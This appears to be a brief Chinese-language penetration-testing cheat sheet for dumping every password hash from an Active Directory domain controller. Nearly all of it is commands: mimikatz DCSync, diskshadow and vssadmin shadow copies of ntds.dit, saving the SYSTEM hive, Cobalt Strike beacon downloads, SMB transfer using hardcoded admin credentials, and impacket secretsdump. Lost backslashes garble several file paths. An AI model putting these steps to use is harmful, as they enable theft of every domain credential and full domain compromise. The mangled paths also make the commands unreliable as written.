一、dcsync导入域内所有hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"
二、利用diskshadow 之前需要先切换到 system32 目录下
diskshadow.exe
set context persistent nowriters
add volume c: alias stack
create
expose %stack% z: DISKSHADOW> exec "cmd.exe" /c copy z:windows
tds
tds.dit c:windows emp
tds.dit
delete shadows all
list shadows all
reset DISKSHADOW> exit
reg save hklmsystem c:windows empsystem.hive
beacon> download ntds.dit beacon> download system.hive beacon> downloads
三、将两个文件从域控托回被控机
net use \192.168.75.129c$ /user:"yiwangAdministrator" "admin123"
move \192.168.75.129admin$ emp tds.dit c:windows emp
move \192.168.75.129admin$ empsystem.hive c:windows emp
net use * /del /yes
mpacket中用 secretsdump.py脚本进行解密
python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt
四、vssadmin离线导入hash
vssadmin list shadows
vssadmin create shadow /for=c:
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy65windowsNTDS
tds.dit c:windows emp
tds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:windows emp
tds.dit
reg save hklmsystem c:windows empsystem.hive
参考:
https://xz.aliyun.com/t/2527#toc-1